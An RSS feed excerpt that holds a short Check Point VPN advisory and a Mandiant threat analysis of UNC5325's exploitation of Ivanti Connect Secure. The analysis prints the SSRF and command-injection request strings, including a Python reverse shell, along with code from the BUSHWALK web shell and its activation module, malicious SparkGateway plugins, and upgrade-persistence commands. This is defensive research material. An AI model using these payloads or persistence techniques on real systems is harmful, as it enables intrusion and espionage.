<description><![CDATA[Check Point Research has identified active exploitation of CVE-2026-50751, a critical authentication bypass vulnerability affecting Check Point Remote Access VPN and Mobile Access deployments configured to use the deprecated IKEv1 key exchange protocol. By exploiting a logic flaw in certificate validation, an attacker can establish a VPN session without possession of a valid password, effectively bypassing authentication requirements. Additional post-authentication activity is required to access internal resources or escalate privileges. To date, the observed exploitation has been limited to a few dozen targeted organizations globally. One case involved confirmed post-compromise activity associated with Qilin ransomware affiliate. Customers using IKEv1 key [&hellip;]
The post Security Advisory &ndash; Action Required &ndash; Active Exploitation of Check Point VPN Authentication Bypass (CVE-2026-50751) appeared first on Check Point Blog. ]]></description>
<link>https://tsecurity.de/de/3581110/IT+Sicherheit/Cybersecurity+Nachrichten/Security+Advisory+%E2%80%93+Action+Required+%E2%80%93+Active+Exploitation+of+Check+Point+VPN+Authentication+Bypass+%28CVE-2026-50751%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581110/IT+Sicherheit/Cybersecurity+Nachrichten/Security+Advisory+%E2%80%93+Action+Required+%E2%80%93+Active+Exploitation+of+Check+Point+VPN+Authentication+Bypass+%28CVE-2026-50751%29/</guid>
<pubDate>Mon, 08 Jun 2026 12:35:06 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts]]></title> 
<description><![CDATA[Written by: Matt Lin, Robert Wallace, Austin Larsen, Ryan Gandrud, Jacob Thompson, Ashley Pearson, Ashley Frazer

&nbsp;
Mandiant and Ivanti&#039;s investigations into widespread&nbsp;Ivanti zero-day exploitation&nbsp;have continued across a variety of industry verticals, including the U.S. defense industrial base sector. Following the initial publication on Jan. 10, 2024, Mandiant observed mass attempts to exploit these vulnerabilities by a small number of China-nexus threat actors, and development of a mitigation bypass exploit targeting&nbsp;CVE-2024-21893&nbsp;used by&nbsp;UNC5325, which we introduced in our&nbsp;&quot;Cutting Edge, Part 2&quot; blog post.&nbsp;
Notably, Mandiant has identified UNC5325 using a combination of living-off-the-land (LotL) techniques to better evade detection, while deploying novel malware such as LITTLELAMB.WOOLTEA in an attempt to persist across system upgrades, patches, and factory resets. While the limited attempts observed to maintain persistence have not been successful to date due to a lack of logic in the malware&#039;s code to account for an encryption key mismatch, it further demonstrates the lengths UNC5325 will go to maintain access to priority targets and highlights the importance of ensuring network appliances have the latest updates and patches.
Ivanti customers are urged to take immediate action to ensure protection if they haven&#039;t done so already. A new version of the external Integrity Checking Tool (ICT), which helps detect these persistence attempts, is now available. See Ivanti&#039;s&nbsp;security advisory&nbsp;and refer to our updated&nbsp;remediation and hardening guide, which includes the latest recommendations.
The exploitation of the Ivanti zero-days has likely impacted numerous appliances. While much of the activity has been automated, there has been a smaller subset of follow-on activity providing further insights on attacker tactics, techniques, and procedures (TTPs). Mandiant assesses additional actors will likely begin to leverage these vulnerabilities to enable their operations.
To date, Ivanti has disclosed the following five vulnerabilities affecting Ivanti Connect Secure and other products.



























Date


CVE


CVSS


Description




Jan. 10, 2024


CVE-2023-46805


8.2


Authentication bypass vulnerability in web component




Jan. 10, 2024


CVE-2024-21887


9.1


Command injection vulnerability in web component




Jan. 31, 2024


CVE-2024-21888


8.8


Privilege escalation vulnerability in web component




Jan. 31, 2024


CVE-2024-21893


8.2


SSRF vulnerability in the SAML component




Feb. 08, 2024


CVE-2024-22024


8.3


XXE vulnerability in the SAML component



























Table 1: Ivanti vulnerability disclosures Jan. 10, 2024 to Feb. 8, 2024
In our&nbsp;previous blog post, we described a mitigation bypass that was used to drop a newly identified BUSHWALK webshell. The mitigation bypass is now tracked as&nbsp;CVE-2024-21893. It is a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure (CS), Policy Secure (PS), and Neurons for Zero Trust Access (NZTA) appliances that was addressed in the patches and mitigations released on Jan. 31, 2024.&nbsp;
Since that post, an additional vulnerability was reported on Feb. 8, 2024, by Ivanti,&nbsp;CVE-2024-22024, related to an XML External Entity (XXE) vulnerability in the SAML component that allows unauthenticated attackers to gain access to restricted resources on patched appliances.
Attribution
UNC5325
UNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances. UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance&#039;s settings in order to evade detection and attempt to maintain persistence. UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK. Mandiant identified TTPs and malware code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware leveraged by UNC3886. Mandiant assesses with moderate confidence that UNC5325 is associated with UNC3886.
UNC3886
UNC3886 is a suspected Chinese espionage operator that has compromised network devices at targets where they&nbsp;leveraged novel techniques&nbsp;against virtualization technologies. They installed custom malware built for such technologies by leveraging code from open-source projects as well as exploiting zero-day vulnerabilities. UNC3886 has primarily targeted the defense industrial base, technology, and telecommunication organizations located in the US and APJ regions. We are continuing to gather evidence and identify overlaps between UNC3886 and other suspected Chinese espionage groups, including targeting and the use of distinct tactics, techniques, and procedures (TTPs).&nbsp;
New TTPs and Malware
Since our last&nbsp;blog post&nbsp;on Ivanti exploitation, Mandiant has identified UNC5325 exploiting CVE-2024-21893 (SSRF) to deploy additional malware and maintain persistent access to compromised appliances. In addition, we have observed new TTPs that attempted to enable the custom backdoors to persist across factory resets, system upgrades, and patches. The limited attempts observed to maintain persistence have not been successful to date.
Exploitation of CVE-2024-21893 (SSRF)
Mandiant identified active exploitation of CVE-2024-21893 by UNC5325 as early as Jan. 19, 2024, targeting a limited number of Ivanti Connect Secure appliances.
On Jan. 31, 2024, Ivanti disclosed CVE-2024-21893, a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA. To date, we have only identified successful exploitation against Ivanti Connect Secure appliances.
In the same Jan. 31, 2024, announcement, Ivanti released a new XML mitigation to prevent exploitation of all four (4) disclosed CVEs at the time of the announcement. This included:

CVE-2023-46805 (authentication bypass)
CVE-2024-21887 (command injection)
CVE-2024-21888 (privilege escalation)
CVE-2024-21893 (server-side request forgery)

CVE-2024-21893 allowed for an unauthenticated attacker to exploit an appliance by chaining the previously disclosed command injection vulnerability as described in CVE-2024-21887. This includes appliances with the XML mitigation released on Jan. 10, 2024.
Chaining CVE-2024-21893 (SSRF) and CVE-2024-21887 (Command Injection)
Shortly after the disclosure of CVE-2024-21893, Mandiant observed threat actors chaining the SSRF vulnerability with the command injection vulnerabilities described in CVE-2024-21887 to exploit vulnerable devices.
In some instances, publicly available services, such as&nbsp;Interactsh, were used to validate whether the target was vulnerable to CVE-2024-21893.
GET /api/v1/license/keys-status/;python -c &#039;import 
socket;socket.gethostbyname(&quot;.oast.live&quot;)&#039;
Figure 1: CVE-2024-21893 vulnerability validation
Shortly after a vulnerable target was identified, the threat actor executed follow-on commands to perform reconnaissance and, in some cases, establish a reverse shell.
GET /api/v1/license/keys-status/;python -c &#039;import 
socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
;s.connect((&quot;&quot;,));subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]
Figure 2: Python reverse TCP shell
Identifying Exploitation Attempts
Exploitation of the SSRF vulnerability in the SAML component generates up to two (2) log events and some host-based artifacts on an affected appliance.
If the Ivanti Connect Secure appliance is configured to log unauthenticated requests, event ID&nbsp;AUT31556&nbsp;is generated when an unauthenticated attacker requests the vulnerable SAML endpoint,&nbsp;/dana-ws/saml.ws. The event includes the source IP address of the unauthenticated request.
AUT31556: Unauthenticated request url /dana-ws/saml.ws came from IP 
.
Figure 3: Event log entry showing unauthenticated request to vulnerable SAML endpoint
In addition, the server fails to gracefully handle the maliciously crafted SAML payload to exploit CVE-2024-21893. The appliance generates an error event log entry with event ID&nbsp;ERR31903&nbsp;when the&nbsp;saml-server&nbsp;process crashes, which is potentially indicative of an exploitation attempt.
ERR31093: Program saml-server recently failed.
Figure 4: Event log entry of process crash
We recommend analyzing both allocated and unallocated disk space on the forensic image for the presence of the log events as we have observed the threat actor deleting the relevant log files.
Lastly, the crash of the&nbsp;saml-server&nbsp;process generates core dumps located in&nbsp;/data/var/cores/. If the core dumps are available, it is possible to extract the crafted SAML message, HTTP headers of the request, and the source IP address. We have observed the threat actor deleting the contents of the&nbsp;cores&nbsp;directory, but we have successfully recovered relevant fragments of the core dumps through file carving.
BUSHWALK Variant
In&nbsp;Cutting Edge, Part 2, we introduced a new web shell tracked as BUSHWALK associated with the exploitation of CVE-2024-21893 and CVE-2024-21887. Similar to other web shells observed in this campaign, BUSHWALK is written in Perl and embedded into a legitimate Ivanti Connect Secure component,&nbsp;querymanifest.cgi.
Mandiant identified a new variant of BUSHWALK through our incident response engagements. This new variant of BUSHWALK was identified on a compromised appliance less than twelve (12) hours following Ivanti&#039;s disclosure of CVE-2024-21893 on Jan. 31, 2024. The variant is similar to the BUSHWALK sample described in our previous blog post, but with a new function named&nbsp;checkVerison&nbsp;that enables arbitrary file read from the appliance. The function is executed when the decrypted payload contains the string&nbsp;check. Figure 5 shows the relevant&nbsp;checkVerison&nbsp;function.
sub checkVerison
{
    my ($file, $key) = @_;
    my $contents = &quot;&quot;;
    my $buffer;
    my $bytesread = 0;
    my $totalbytesread = 0;
    local *FILE;
    CORE::open(*FILE, $file);
    while($bytesread = sysread(FILE, $buffer, 1024)) {
        $contents .= $buffer;
        $totalbytesread += $bytesread;
    }
    if ($totalbytesread == 0) {
        print &quot;Unable to read file with path: $file&quot;;
        print CGI::header(-type=&gt;&quot;text/html&quot;, -status=&gt; &#039;404 Not Found&#039;);
        exit;
    }
    print CGI::header();
    $contents = RC4($key, $contents);
    $contents = MIME::Base64::encode_base64($contents);
    print $contents;
    close *FILE;
}
Figure 5: BUSHWALK&#039;s checkVerison function for file reading
Note that we have observed the same RC4 key for decrypting issued commands across the two BUSHWALK variants and all identified samples.
In addition, we have seen the threat actor demonstrate a nuanced understanding of the appliance and their ability to subvert detection throughout this campaign. We identified a technique allowing BUSHWALK to remain in an undetected dormant state by creatively modifying a Perl module and LotL technique by using built-in system utilities unique to Ivanti products.
To accomplish this, the threat actor first modifies a Perl module,&nbsp;DSUserAgentCap.pm, that evaluates incoming user agents. The modification enables the threat actor to either activate or deactivate BUSHWALK depending on the incoming HTTP request&#039;s user agent.
Figure 6 provides the excerpt of the modification in&nbsp;DSUserAgentCap.pm. Note the difference in spelling between&nbsp;App1eWebKit&nbsp;and&nbsp;AppIeWebKit&nbsp;in the two user agent strings.
sub getUserAgentType {
   my ($user_agent) = @_;
   if ($user_agent eq &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
App1eWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36&quot;){
        system(&quot;mount -o remount,rw /&quot;);
        system(&quot;/home/bin/configdecrypt /data/runtime
/cockpit/diskAnalysis /data/runtime/cockpit/diskAnalysis.bak&quot;);
        system(&quot;cp /home/webserver/htdocs/dana-na/jam/querymanifest.cgi 
/home/webserver/htdocs/dana-na/jam/querymanifest.cgi.bak&quot;);
        system(&quot;echo &#039;/home/webserver/htdocs/dana-na/jam
/querymanifest.cgi&#039; &gt;&gt; /home/etc/manifest/exclusion_list&quot;);
        system(&quot;mv /data/runtime/cockpit/diskAnalysis.bak 
/home/webserver/htdocs/dana-na/jam/querymanifest.cgi&quot;);
        system(&quot;chmod 755 /home/webserver/htdocs/dana-na/jam
/querymanifest.cgi&quot;);
        system(&quot;mkdir /debug&quot;);
        system(&quot;/home/bin/restartServer.pl Restart&quot;);
        exit(0);
   }
   elsif ($user_agent eq &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppIeWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36&quot;){
        system(&quot;mv /home/webserver/htdocs/dana-na/jam
/querymanifest.cgi.bak /home/webserver/htdocs/dana-na/jam/querymanifest.cgi&quot;);
        system(&quot;touch -r /home/webserver/htdocs/dana-na/auth
/setcookie.cgi /home/webserver/htdocs/dana-na/jam/querymanifest.cgi&quot;);
        system(&quot;/bin/sed -i &#039;\$d&#039; /home/etc/manifest/exclusion_list&quot;);
        system(&quot;rm -rf /debug&quot;);
        system(&quot;mount -o remount,ro /&quot;);
        exit(0);
   }
   else{
        my $type  = DSClientTypes::getUserAgentType($user_agent);
        return $type;
   }
Figure 6: Excerpt of DSUserAgentCap.pm
An encrypted version of BUSHWALK is placed in a directory excluded by the integrity checker tool (ICT) in&nbsp;/data/runtime/cockpit/diskAnalysis.&nbsp;
The activation routine (the&nbsp;if&nbsp;block) uses a built-in utility on the appliance located in&nbsp;/home/bin/configdecrypt&nbsp;used for decrypting the system&#039;s configuration. The routine executes the&nbsp;configdecrypt&nbsp;utility to decrypt&nbsp;diskAnalysis&nbsp;containing the BUSHWALK web shell. It then makes a backup of the original&nbsp;querymanifest.cgi&nbsp;file, adds it to the&nbsp;exclusion_list, moves BUSHWALK to the web server directory, and restarts the web server to load the web shell.
The deactivation routine (the&nbsp;elseif&nbsp;block) restores the original&nbsp;querymanifest.cgi&nbsp;file, timestomps it using&nbsp;touch&nbsp;to hide their activity, removes the path of BUSHWALK from&nbsp;exclusion_list, and restarts the web server. However, the encrypted version of BUSHWALK remains dormant in a dynamic directory and therefore is not scanned by the integrity checker tool. It continues to quietly persist in&nbsp;/data/runtime/cockpit/diskAnalysis&nbsp;until the threat actor activates it again.
The internal ICT is configured to run in two-hour intervals by default and is meant to be run in conjunction with continuous monitoring. Any malicious file system modifications made and reverted between the two-hour scan intervals would remain undetected by the ICT. When the activation and deactivation routines are performed tactfully in quick succession, it can minimize the risk of ICT detection by timing the activation routine to coincide precisely with the intended use of the BUSHWALK webshell.
SparkGateway Plugin Abuse
In a limited number of instances following exploitation of CVE-2024-21893, we identified the use of SparkGateway plugins to persistently inject shared objects and deploy backdoors. SparkGateway is a legitimate component of the Ivanti Connect Secure appliance that enables remote access protocols over a browser, such as RDP or SSH. The functionality of SparkGateway can be extended through plugins.
PITFUEL Plugin
Mandiant identified a SparkGateway plugin named&nbsp;plugin.jar&nbsp;(PITFUEL) that loads the shared object&nbsp;libchilkat.so&nbsp;(LITTLELAMB.WOOLTEA) through the Java Native Interface (JNI) by calling&nbsp;System.load(). The shared object persistently deploys backdoors and contains capabilities to persist across system upgrade events, patches, and factory resets.
Figure 7 shows the relevant excerpt of the&nbsp;PluginManager&nbsp;class in PITFUEL.
public class PluginManager {
  static {
    try {
      System.load(&quot;/home/runtime/SparkGateway/libchilkat.so&quot;);
    } catch (Exception exception) {}
    try {
      Config config = Config.getInstance();
      config.remove(&quot;plugin&quot;);
      config.remove(&quot;pluginFile&quot;);
    } catch (Exception exception) {}
    try {
      Logger logger = Logger.getLogger(Config.class.getName());
      SparkGatewayFilter sparkGatewayFilter = new SparkGatewayFilter();
      logger.setFilter(sparkGatewayFilter);
    } catch (Exception exception) {}
  }
  
  static class SparkGatewayFilter implements Filter {
    public boolean isLoggable(LogRecord param1LogRecord) {
      return (param1LogRecord.getLevel().intValue() != Level.
SEVERE.intValue());
    }
  }
}

Figure 7: PluginManager class of SparkGateway plugin (PITFUEL)
Upon execution,&nbsp;libchilkat.so&nbsp;(LITTLELAMB.WOOLTEA) performs a number of initialization routines to ensure that it persistently runs in the background on the compromised system. It accomplishes this by daemonizing itself, attempting to trap&nbsp;SIGPIPE,&nbsp;SIGKILL, and&nbsp;SIGTERM&nbsp;signals, and adjusting the out of memory (OOM) adjustment value (oom_adj) to&nbsp;-17&nbsp;to keep the process running even when the system is out of memory.
Persistence Across System Upgrades and Patches
Upon first execution, LITTLELAMB.WOOLTEA executes the&nbsp;first_run()&nbsp;function. It calls the&nbsp;edit_current_data_backup()&nbsp;function that appends its malicious components to an archive,&nbsp;/data/pkg/data-backup.tgz. Figure 8 provides the equivalent command sequence.
gzip -d /data/pkg/data-backup.tgz &gt; /dev/null 2&gt;&amp;1

tar -rf /data/pkg/data-backup.tar /data/runtime/SparkGateway/plugin.jar 
/data/runtime/SparkGateway/libchilkat.so 
/data/runtime/SparkGateway/gateway.conf &gt; /dev/null 2&gt;&amp;1

gzip /data/pkg/data-backup.tar &gt; /dev/null 2&gt;&amp;1

mv /data/pkg/data-backup.tar.gz /data/pkg/data-backup.tgz &gt; /dev/null 2&gt;&amp;1
Figure 8: Command sequence executed by edit_current_data_backup()
During a system upgrade or when applying a patch,&nbsp;data-backup.tgz&nbsp;contains a backup of the&nbsp;data&nbsp;directory that is restored after the upgrade event. In addition, the function timestomps&nbsp;data-backup.tgz&nbsp;by calling&nbsp;utimensat. This modification would ensure its malicious components (plugin.jar,&nbsp;libchilkat.so, and&nbsp;gateway.conf) persist across system upgrades and patches.
(cd / ; tar -zxBf /data/pkg/data-backup.tgz &gt;/dev/null 2&gt;&amp;1)
Figure 9: Decompression of data-backup.tgz during system upgrade events
In addition, the malware contains a function named&nbsp;upgrade_monitor()&nbsp;that supports persistence across system upgrade and patch events. We assess that this acts as a secondary persistence method by making a modification at the precise moment of a system upgrade or patch event.
It monitors for system upgrade events by continually checking the filesystem for the existence of&nbsp;/tmp/data/root/dev. This path is used to support a system upgrade process. In other words, the presence of the path indicates to the malware the existence of a system upgrade event.
If the path exists, it intervenes the system upgrade process by appending itself and its constituent components into the archive&nbsp;/tmp/data/root/samba_upgrade.tar. During a system upgrade process, the appliance decompresses&nbsp;samba_upgrade.tar&nbsp;for data migration purposes. Figure 10 provides the command executed by&nbsp;upgrade_monitor()&nbsp;when it detects the existence of&nbsp;/tmp/data/root/dev.
tar -rf /tmp/data/root/samba_upgrade.tar 
/home/runtime/SparkGateway/plugin.jar 
/home/runtime/SparkGateway/libchilkat.so 
/home/runtime/SparkGateway/gateway.conf  &gt; /dev/null 2&gt;&amp;1
Figure 10: Shell command executed by upgrade_monitor()
During the system upgrade or patch process, the&nbsp;post-install&nbsp;bash script executes the following to decompress&nbsp;samba_upgrade.tar, copying the malicious components (libchilkat.so,&nbsp;plugin.jar, and&nbsp;gateway.conf) to the new active partition. Figure 11 provides the relevant command sequence from&nbsp;post-install.
tar -tf $upgrade_partition samba_upgrade.tar &gt; /dev/null 2&gt;&amp;1
if [ $? -eq 0 ]; then
    (cd /; tar -xf $upgrade_partition samba_upgrade.tar &gt;/dev/null)
fi
&nbsp;Figure 11: Decompression of samba_upgrade.tar by post-install script
Attempted Persistence Across Factory Resets
Next, LITTLELAMB.WOOLTEA executes&nbsp;first_run(), which reads and checks the hardware of the appliance by reading the first four (4) bytes of the motherboard serial number at&nbsp;/proc/ive/mbserialnumber&nbsp;and adjusts its behavior to mount the root partition of the factory reset image for further modification.
If the four (4) bytes match the strings&nbsp;0331,&nbsp;0332,&nbsp;0340,&nbsp;0481, or&nbsp;0482, the malware executes the following command to mount&nbsp;/dev/md5&nbsp;(factory reset root partition) on&nbsp;/dev/loop5.
/bin/losetup /dev/loop5 /dev/md5 &gt; /dev/null 2&gt;&amp;1
Figure 12: Command to set up loop device for block device /dev/md5
Each of the four-byte strings corresponds to a physical Pulse Secure Appliance (PSA) or a Ivanti Secure Appliance (ISA) product.























Machine ID


Appliance Model Number




0331


PSA 7000F




0332


PSA 7000C




0340


PSA 10000




0481


ISA 8000F




0482


ISA 8000C






















Table 2: Machine ID to physical appliance model number
Otherwise, the malware executes the following command to mount&nbsp;/dev/xda5&nbsp;(factory reset root partition) on&nbsp;/dev/loop5&nbsp;if the four (4) bytes do not match any of the machine ID strings or if it fails to read&nbsp;/proc/ive/mbserialnumber.

/bin/losetup /dev/loop5 /dev/xda5 &gt; /dev/null 2&gt;&amp;1
Figure 13: Command to set up loop device for block device /dev/xda5
Next, LITTLELAMB.WOOLTEA mounts the newly created loop device (/dev/loop5) to&nbsp;/tmp/tmpmnt&nbsp;to modify the factory reset root partition. Figure 14 provides the equivalent command sequence.
mkdir -m 777 /tmp/tmpmnt
mount /dev/loop5 /tmp/tmpmnt -t ext2
Figure 14: Command to mount loop device /dev/loop5
It&#039;s important to note that&nbsp;/bin/losetup&nbsp;uses an embedded encryption key within the running version&#039;s kernel used to decrypt the running version&#039;s partition. This encryption key is hardcoded at the time of build compilation and is unique for each appliance version.
However, the factory reset partition maintains its own independent encryption key embedded in the factory kernel. If the current running version and the factory reset deployment versions differ (i.e., the appliance or VM has been updated at least once), then&nbsp;/bin/losetup&nbsp;will fail to decrypt the factory reset partition due to the encryption key mismatch and thus the malware will not persist after factory reset.
Note that Mandiant and Ivanti conducted forensic analysis on an affected appliance after factory reset to confirm no evidence of malware persistence. Because the appliance had undergone at least one update since its initial deployment, the malware failed to persist through the factory reset as the encryption key of the factory reset kernel and the running version kernel were different.
If&nbsp;losetup&nbsp;had succeeded in decrypting the factory reset image, the malware would continue its persistence workflow. To modify the factory reset process, it calls the&nbsp;edit_factory_reset()&nbsp;function that renames the&nbsp;tar&nbsp;binary to&nbsp;tra&nbsp;in the mounted factory reset partition.
mv /tmp/tmpmnt/bin/tar /tmp/tmpmnt/bin/tra
Figure 15: Command to rename tar binary
Then, the malware writes a trojanized version of the&nbsp;tar&nbsp;binary to&nbsp;/tmp/tmpmnt/bin/tar, makes the&nbsp;tar&nbsp;binary executable, and preemptively appends its malicious components (using the legitimate&nbsp;tar&nbsp;utility) to the archive&nbsp;/tmp/tmpmnt/bin/samba_upgrade.tar&nbsp;inside the factory reset partition.
tar -rf /tmp/tmpmnt/bin/samba_upgrade.tar 
/home/runtime/SparkGateway/plugin.jar 
/home/runtime/SparkGateway/libchilkat.so 
/home/runtime/SparkGateway/gateway.conf  &gt; /dev/null 2&gt;&amp;1
Figure 16: Command to archive components to samba_upgrade.tar
The trojanized&nbsp;tar&nbsp;binary checks for a set of specific conditions to copy the malicious&nbsp;/bin/samba_upgrade.tar&nbsp;to&nbsp;/tmp/samba_upgrade.tar&nbsp;during the factory reset process.&nbsp;

There are four arguments provided (argc&nbsp;is equal to 4)
The second argument,&nbsp;argv[1], is&nbsp;-cf&nbsp;
The fourth argument,&nbsp;argv[3], is&nbsp;no-data

If any of these conditions are not met, the trojanized&nbsp;tar&nbsp;binary executes the legitimate&nbsp;tar&nbsp;(/bin/tra) utility backed up in Figure 15.
The conditions are satisfied by a component of the factory reset procedure responsible for resetting the configuration (dsconfigreset). The utility creates an empty file in&nbsp;/tmp/no-data&nbsp;and archives it using&nbsp;/bin/tar -cf. Figure 17 provides the relevant command sequence.
echo &quot;&quot; &gt; /tmp/no-data
(cd /tmp; /bin/tar -cf $tmp_part no-data)
Figure 17: Command executed during factory reset by dsconfigreset
When&nbsp;dsconfigreset&nbsp;executes&nbsp;/bin/tar -cf $tmp_part no-data, the trojanized&nbsp;tar&nbsp;copies the contents of&nbsp;/bin/samba_upgrade.tar&nbsp;containing its malicious components to&nbsp;/tmp/samba_upgrade.tar&nbsp;in the factory reset root partition (mounted on&nbsp;/tmp/tmpmnt).
Next, similar to the previously described system upgrade persistence flow, the appliance executes the&nbsp;post-install&nbsp;bash script during the installation process of the new system. This script decompresses the&nbsp;samba_upgrade.tar&nbsp;archive in the factory reset partition, copying the malicious components (libchilkat.so,&nbsp;plugin.jar, and&nbsp;gateway.conf) to the new active partition created after the factory reset.
Hooking the Web Server Process
The&nbsp;httpd_monitor()&nbsp;function ensures the persistent injection of another shared object,&nbsp;libaprhelper.so&nbsp;(PITSOCK), into the&nbsp;web&nbsp;process using a built-in injection function named&nbsp;inject_loop().&nbsp;
PITSOCK hooks the functions&nbsp;accept&nbsp;and&nbsp;setsockopt&nbsp;of the&nbsp;web&nbsp;process by modifying its procedure linkage table (PLT). This enables backdoor communication via the Unix socket&nbsp;/tmp/clientsDownload.sock&nbsp;when it receives a specific 48-byte magic byte sequence in the incoming buffer.
Creating the Malicious SparkGateway Plugin
Lastly,&nbsp;libchilkat.so&nbsp;calls&nbsp;persist(), which modifies the SparkGateway configuration file. Figure 18 shows an excerpt from the modified SparkGateway configuration file to support and load the plugin.
plugin = com.toremote.gateway.plugin.PluginManager
pluginFile = /home/runtime/SparkGateway/plugin.jar
Figure 18: Excerpt of SparkGateway configuration file
Backdoor Features
libchilkat.so&nbsp;also serves as a stand-alone backdoor that supports expected features such as command execution, file management, shell creation, SOCKS proxy, and network traffic tunneling. It communicates over SSL using the private key located on the Ivanti Connect Secure web server (/home/webserver/conf/ssl.key/secure.key) and communicates using the socket&nbsp;/tmp/clientsDownload.sock.
PITDOG Plugin
Mandiant identified a second malicious SparkGateway plugin named&nbsp;security.jar&nbsp;(PITDOG) that uses&nbsp;Kubo Injector&nbsp;(memorysCounter) to inject a shared object,&nbsp;mem.rd&nbsp;(PITHOOK), into the&nbsp;web&nbsp;process memory, and persistently executes a backdoor,&nbsp;dsAgent&nbsp;(PITSTOP). Figure 19 shows the relevant excerpts from&nbsp;security.jar.
public class SparkPlugin implements ManagerInterface {
  public static void watchdog() {
    try {
      Thread.sleep(300000L);
      ProcessBuilder processBuilder = new ProcessBuilder(new String[0]);
      Process process = Runtime.getRuntime().exec(new String[] { &quot;/bin/sh&quot;, 
&quot;-c&quot;, &quot;ps aux|grep &#039;/home/bin/web&#039;|grep -v grep | 
awk &#039;{if (NR!=1) {print $2}}&#039;&quot; });
      BufferedReader reader = new BufferedReader(new InputStreamReader
(process.getInputStream()));
      String line;
      while ((line = reader.readLine()) != null) {
        int procnum = Integer.parseInt(line);
        String catprocstr = String.format(&quot;cat /proc/%d/maps | grep mem.rd&quot;, 
new Object[] { Integer.valueOf(procnum) });
        Process processinjectres = Runtime.getRuntime().exec(new String[] 
{ &quot;/bin/sh&quot;, &quot;-c&quot;, catprocstr });
        BufferedReader processinjectreader = new BufferedReader(new 
InputStreamReader(processinjectres.getInputStream()));
        if ((line = processinjectreader.readLine()) == null) {
          String processinjectstr = String.format(&quot;/data/runtime/cockpit
/memorysCounter -p %d /data/runtime/cockpit/mem.rd&quot;, new Object[] 
{ Integer.valueOf(procnum) });
          Process process1 = Runtime.getRuntime().exec(new String[] 
{ &quot;/bin/sh&quot;, &quot;-c&quot;, processinjectstr });
        } 
      } 
      Process processps = Runtime.getRuntime().exec(new String[] 
{ &quot;/bin/sh&quot;, &quot;-c&quot;, &quot;ps aux|grep &#039;/data/runtime/cockpit/dsAgent&#039;|grep 
-v grep | awk &#039;{print $2}&#039;&quot; });
      BufferedReader readerps = new BufferedReader(new 
InputStreamReader(processps.getInputStream()));
      if ((line = readerps.readLine()) == null) {
        Process processinjectres = Runtime.getRuntime().exec(&quot;rm 
-f /data/runtime/cockpit/wd.lock&quot;);
        ProcessBuilder processBuilder1 = (new ProcessBuilder(new 
String[] { &quot;/data/runtime/cockpit/dsAgent&quot; })).redirectErrorStream(true);
        Process process1 = processBuilder1.start();
      } 
    } catch (Exception exception) {}
  }
  
  public HandshakeInterface getHandshakePlugin() {
    long timeInterval = 10000L;
    Runnable runnable = new Runnable() {
        public void run() {
          while (true) {
            SparkPlugin.watchdog();
            try {
              Thread.sleep(10000L);
            } catch (InterruptedException e) {
              e.printStackTrace();
            } 
          } 
        }
      };
    Thread thread = new Thread(runnable);
    thread.start();
    return null;
  }
Figure 19: Excerpt of security.jar plugin
The SparkGateway configuration is modified to load the plugin. Figure 20 shows the relevant excerpt from&nbsp;gateway.conf.
plugin = SparkPlugin
pluginFile = /data/runtime/cockpit/security.jar
Figure 20: Excerpt of SparkGateway configuration file
The&nbsp;security.jar&nbsp;plugin is executed during the negotiation of an RDP connection when the system invokes the Handshake plugin. The&nbsp;getHandshakePlugin()&nbsp;method creates a new thread from a Runnable interface that repeatedly calls&nbsp;SparkPlugin.watchdog()&nbsp;every ten (10) seconds. This acts as a persistence method to ensure the continuous execution of the malicious&nbsp;watchdog&nbsp;method without interfering with the primary operation of the SparkGateway application.
The&nbsp;watchdog&nbsp;method first checks if the shared object&nbsp;mem.rd&nbsp;(PITHOOK) is mapped within the&nbsp;web&nbsp;process memory. If not, it injects&nbsp;mem.rd&nbsp;into the&nbsp;web process.
Figure 21 shows the command executed to inject PITHOOK (mem.rd) into the&nbsp;web process, where&nbsp;%d&nbsp;represents the process ID (PID) of the&nbsp;web&nbsp;process.
/data/runtime/cockpit/memorysCounter -p %d /data/runtime/cockpit/mem.rd
Figure 21: Command to inject PITHOOK
We determined that&nbsp;/data/runtime/cockpit/memorysCounter&nbsp;is a direct instance of&nbsp;Kubo Injector&nbsp;without any additional modifications or changes. Kubo Injector is based on the popular&nbsp;linux-inject&nbsp;project, a utility that can inject a shared object into an arbitrary process given a process name or process ID.
PITHOOK hooks the accept and accept4 functions within the web process by modifying the PLT. When PITHOOK receives a buffer matching the predefined magic byte sequence, it will duplicate the socket and forward it to PITSTOP over the Unix domain socket /data/runtime/cockpit/wd.fd.
Lastly, the&nbsp;watchdog&nbsp;method will execute the PITSTOP backdoor (/data/runtime/cockpit/dsAgent) if it is not already running.
PITSTOP creates and listens on the Unix domain socket located at /data/runtime/cockpit/wd.fd. It waits to receive a socket forwarded by PITHOOK after receiving the predefined magic byte sequence. Then PITSTOP duplicates the socket for further communication over TLS. When the TLS connection is established, PITSTOP uses Base64 and a hard-coded AES key to evaluate the incoming command. It supports shell command execution, file write, and file read on the compromised appliance.
Outlook and Implications
UNC5325&rsquo;s TTPs and malware deployment showcase the capabilities that&nbsp;suspected China-nexus espionage actors&nbsp;have continued to leverage against edge infrastructure in conjunction with zero days. Similar to&nbsp;UNC4841&rsquo;s familiarity with Barracuda ESGs, UNC5325 demonstrates significant knowledge of the Ivanti Connect Secure appliance as seen in both the malware they used and the attempts to persist across factory resets. Mandiant expects UNC5325 as well as other China-nexus espionage actors to continue to leverage zero day vulnerabilities on network edge devices as well as&nbsp;appliance-specific malware&nbsp;to gain and maintain access to target environments.
